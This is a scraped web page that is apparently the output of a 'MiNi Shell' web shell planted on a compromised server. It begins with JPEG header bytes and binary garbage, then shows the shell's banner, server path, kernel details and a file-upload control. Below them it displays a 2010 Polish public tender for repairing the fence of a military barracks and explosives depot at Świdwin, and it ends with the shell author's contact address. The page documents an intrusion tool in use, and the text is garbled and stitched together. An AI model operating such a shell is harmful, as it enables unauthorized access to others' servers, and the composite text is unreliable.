JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100127/18521-N-2010.html

<p class="kh_header"><b>Gdańsk: Zadanie 52532 - Remont ogrodzenia  lotniska  w Świdwinie</b><br>
<b>Numer ogłoszenia: 18521 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 17 Terenowy Oddział Lotniskowy , ul. Konopnickiej 13, 80-240 Gdańsk, woj. pomorskie, tel. 058 348 3403, faks 058 3483404.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna podległa Ministrowi Obrony Narodowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie 52532 - Remont ogrodzenia  lotniska  w Świdwinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu ogrodzenia kompleksu koszarowego i składu materiałów wybuchowych (bomboskładu) JW 3294 w Świdwinie w następującym zakresie:
I. Remont ogrodzenia kompleksu koszarowego

1. Wznowienie granic zewnętrznych wzdłuż nowego ogrodzenia
2. Demontaż istniejącego ogrodzenia długości ok. 3000,0 m
3. Montaż ogrodzenia panelowego na cokole długości ok. 700,0 m.
4. Montaż ogrodzenia z siatki długości ok. 2620,0 m.
5. Montaż ogrodzenia z siatki wysokości 5,0 m długości ok. 182,0 m.
6. Montaż bram szer. 7,0 m samonośnych przesuwanych ręcznie - 3 kpl.
7. Montaż bram szer. 6,0 m dwuskrzydłowych - 3 kpl.
8. Montaż furtek wejściowych - 3 kpl.
9. Wykonanie robót towarzyszących związanych z wykonaniem ogrodzenia.
10. Sporządzenie geodezyjnej inwentaryzacji powykonawczej oraz operatu wznowienia granic w 3 kompletach dla każdego opracowania.

II. Remont ogrodzenia składu materiałów wybuchowych

1. Demontaż istniejącego ogrodzenia długości ok. 2400,0 m.
2. Montaż ogrodzenia z siatki na cokole długości ok. 1317,30 m.
3. Montaż ogrodzenia z siatki długości ok. 1075,70 m.
4. Montaż bram szer. 6,0 m dwuskrzydłowych - 5 kpl.
5. Montaż furtek wejściowych - 3 kpl.
6. Wykonanie robót towarzyszących związanych z wykonaniem ogrodzenia.
7. Sporządzenie geodezyjnej inwentaryzacji powykonawczej w 3 kompletach.

Szczegółowy zakres prac zawarty jest w dokumentacji projektowej oraz przedmiarach robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wadium w wysokości 40 000,00 zł (czterdzieści tysięcy zł)  należy wnieść w terminie do dnia 01.03.2010 r., do godziny 10.30. Nie wniesienie wadium, w tym również na przedłużony okres związania ofertą, lub wniesienie wadium po tym terminie skutkować będzie wykluczeniem oferenta.
2. Wadium może być wniesione w jednej lub kilku następujących formach:
a) w pieniądzu,
b) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy winno być poręczeniem pieniężnym,
c) w gwarancjach bankowych,
d) w gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
3. Wadium wnoszone w pieniądzu należy wpłacać na rachunek 17 Terenowego Oddziału Lotniskowego o numerze: 53 1500 1285 1211 7001 3592 0000.
Będzie ono przechowywane na rachunku bankowym Zamawiającego.
4. Wadium wnoszone w:
a) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej,
b) gwarancjach bankowych,
c) gwarancjach ubezpieczeniowych,
d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275). należy złożyć w formie oryginału w kasie 17 TOL (w godzinach 8.00 - 14.00. 
W dniu ostatecznego terminu do złożenia ofert w godzinach 8.00 - 10.30.
5. Wadium wnoszone w:
a) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -kredytowej,
b) gwarancjach bankowych,
c) gwarancjach ubezpieczeniowych,
d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275). powinno być ważne przez okres związania ofertą.
6. Zwrotu wadium (a w przypadku wniesienia wadium w formie pieniężnej - dyspozycję do banku) Zamawiający będzie realizował zgodnie z art. 46 ustawy Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I. Na podstawie art. 22 Ustawy Prawo zamówień publicznych, w postępowaniu o udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące:
1. Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
2. Posiadania wiedzy i doświadczenia,
3. Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
4. Sytuacji ekonomicznej i finansowej.
Ponadto, w postępowaniu o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. Złożą wymagane dokumenty określone w specyfikacji istotnych warunków zamówienia na podstawie Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać Zamawiający od Wykonawcy - Dz. U. z 2009 r. Nr 226, poz. 1817.
2. Spełniają wymogi wynikające z treści niniejszej specyfikacji istotnych warunków zamówienia oraz wzoru umowy.
II.W przypadku zaistnienia okoliczności, o których mowa w art. 24 ust. 1 i 2, Zamawiający wykluczy Wykonawcę biorącego udział w postępowaniu o udzielenie zamówienia, a złożoną przez niego ofertę uzna za odrzuconą. Zamawiający zawiadomi równocześnie Wykonawców, którzy zostaną wykluczeni z postępowania, podając uzasadnienie faktyczne i prawne, z zastrzeżeniem art. 92 ust. 1, pkt. 3.
   
OFERTA WSPÓLNA
W trakcie postępowania Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia na zasadach określonych w art. 23 Ustawy PZP.
W przypadku składania oferty wspólnej, wszystkie podmioty mają obowiązek dostarczyć dokumenty w zakresie określonym w SIWZ. Informacje na temat poszczególnych firm należy przedstawić osobno oddzielając w sposób widoczny początek i koniec tych informacji (forma wyodrębnienia poszczególnych firm pozostaje w gestii Wykonawcy). Jednocześnie należy zachować kolejność numeracji kart całej oferty.
Wykonawcy wspólnie ubiegający się o zamówienie, których oferta zostanie uznana jako najkorzystniejsza, przed podpisaniem umowy o realizację zamówienia są zobowiązani przedstawić Zamawiającemu umowę regulującą współpracę tychże podmiotów. 
Umowę konsorcyjną podpisaną przez wszystkie podmioty wchodzące w skład konsorcjum należy złożyć razem z umową nr /2010 na wykonanie zamówienia. Termin złożenia umów zostanie określony po zakończeniu postępowania na ww. zadanie.
W składanej ofercie należy wskazać lidera - jako reprezentanta oferentów - z którym zostanie zawarta umowa. Reprezentant konsorcjum (podmiotów występujących wspólnie) winien być również upoważniony do zaciągania zobowiązań w imieniu i na rzecz każdego z partnerów oraz do wyłącznego występowania w realizacji kontraktu. Dotyczy to również płatności za wykonanie zamówienia. 

UWAGA: reprezentant oferentów powinien posiadać pisemne upoważnienie do występowania w imieniu konsorcjum. Upoważnienie to powinno być podpisane przez prawnie upoważnionych przedstawicieli każdego z partnerów konsorcjum.
Formularz oferty podpisuje upoważniony reprezentant zespołu oferentów. Wszelkie 
informacje zawarte w Specyfikacji Istotnych Warunków Zamówienia są wiążące dla każdego z oferentów wchodzących w skład konsorcjum..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I.Zamawiający żąda, żeby w składanej ofercie Wykonawca przedstawił następujące 
oświadczenia i dokumenty:
1. Oświadczenie o braku podstaw do wykluczenia.
2. Oświadczenie oferenta wynikające z treści ustawy (wg wzoru załącznika do formularza oferty), że:
a. posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, 
b. posiada wiedzę  i doświadczenie,
c. dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi
do wykonania zamówienia,
d. jest w sytuacji ekonomicznej i finansowej.
3. Oświadczenie, że oferent zapoznał się ze specyfikacją istotnych warunków zamówienia wraz z załącznikami do specyfikacji oraz, że zapoznał się i uzyskał na własną odpowiedzialność i ryzyko wszelkie istotne informacje o warunkach, w których będzie realizowany przedmiot zamówienia i uwzględnił je w kalkulacji ceny oferty.
4. Oświadczenie, że złożył ofertę na warunkach określonych przez Zamawiającego na realizację przedmiotu zamówienia i w przypadku wyboru jego oferty jako najkorzystniejszej zobowiązuje się do wykonania przedmiotu zamówienia zgodnie
z Specyfikacją techniczną i  załączoną do SIWZ.
5. Oświadczenie, że złożył ofertę równoważną na realizację przedmiotu zamówienia 
i w przypadku wyboru jego oferty jako najkorzystniejszej zobowiązuje się na własny koszt i własnym staraniem uzyskać niezbędne uzgodnienia, opinie, pozwolenia mogące mieć wpływ na realizację  zadania zgodnie z obowiązującymi przepisami (dotyczy ofert równoważnych). 
II. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Ustawy Prawo zamówień  publicznych, Zamawiający żąda przedstawienia w  składanej ofercie, następujących dokumentów:
1. Aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art.24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed terminem składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust.1 pkt.2 ustawy,
2. Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust. 1 pkt. 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt.9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed terminem składania ofert.
4.Aktualnego zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłaceniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5. Aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłaceniem składek na ubezpieczenia zdrowotne i społeczne lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej  niż 3 miesiące przed upływem terminu składania ofert.
6. Oświadczenie o posiadaniu przez geodetę (pracownię geodezyjną) certyfikowanych urządzeń do przetwarzania informacji niejawnych na poziomie tajemnicy służbowej o klauzuli POUFNE.

III. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia  Zamawiający żąda przedstawienia w składanej ofercie:
1. oświadczenia stwierdzającego, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia budowlane bez ograniczeń do pełnienia samodzielnych funkcji w budownictwie - kierownika budowy w branży konstrukcyjno-budowlanej będącego członkiem Okręgowej Izby Inżynierów Budownictwa oraz posiadającego aktualne, na czas składania i otwarcia ofert, ubezpieczenie od odpowiedzialności cywilnej oraz poświadczenie bezpieczeństwa osobowego do klauzuli POUFNE w zakresie geodety posiadającego poświadczenie bezpieczeństwa osobowego do klauzuli POUFNE.
2. Wykazu wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, polegających na wykonaniu ogrodzenia 
z siatki stalowej plecionej o wysokości min. 2 m i długości min. 500 m
z zabezpieczeniem górą z drutu kolczastego lub Concertiny, z podaniem daty i miejsca wykonania, długości i rodzaju ogrodzenia oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie.
IV. W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Zamawiający żąda przedstawienia:
1. Opłaconej polisy a w przypadku jej braku innego dokumentu potwierdzającego, 
że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.

UWAGA: Zamawiający wymaga wskazania przez Wykonawcę (konsorcjum) w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom. Warunki dotyczące zatrudnienia podwykonawcy określone są w § 10 wzoru umowy 
V. 
1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w:
     1) pkt. II. ppkt. 1, 3 i 4 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1. Nie otwarto jego likwidacji ani nie ogłoszono upadłości.
2. Nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne
i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub
rozłożenie na raty zaległych płatności lun wstrzymanie w całości wykonania decyzji
właściwego organu.
3. Nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
2) pkt. II ppkt. 2 składa zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art. 24 ust. 1 pkt. 4 - 8 ustawy.
2. Dokumenty o których mowa w pkt II) ppkt. 1 i 3 oraz ppkt. 2), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument o którym mowa w pkt. II) ppkt. 4 i 5, powinien być wystawiony nie wcześniej niż 3 miesiące przed  upływem terminu składania ofert.
3. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. IV oraz w pkt. II. 3, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. przepis pkt. 2 stosuje się odpowiednio. 
VI.  
1. Wszystkie osoby wskazane do wykonania zamówienia winny posługiwać się językiem polskim lub wykonawca zapewni w godzinach pracy odpowiednią liczbę kompetentnych tłumaczy języka polskiego.
2. Dokumenty należy składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
3.  W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w § 1 ust. 2 i 3, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczone za zgodność z oryginałem przez Wykonawcę lub te podmioty.
4. Zamawiający zażąda przedstawienia oryginału lub notarialnie poświadczonej kopii
dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
5. Dokumenty sporządzone w języku obcym powinny być składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.17tol-gdansk.com.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.17tol-gdansk.com.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2010 godzina 10:30, miejsce: Siedziba Zamawiającego: 17 Terenowy Oddział Lotniskowy w Gdańsku, ul. Marii Konopnickiej 13, 80-240 Gdańsk..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com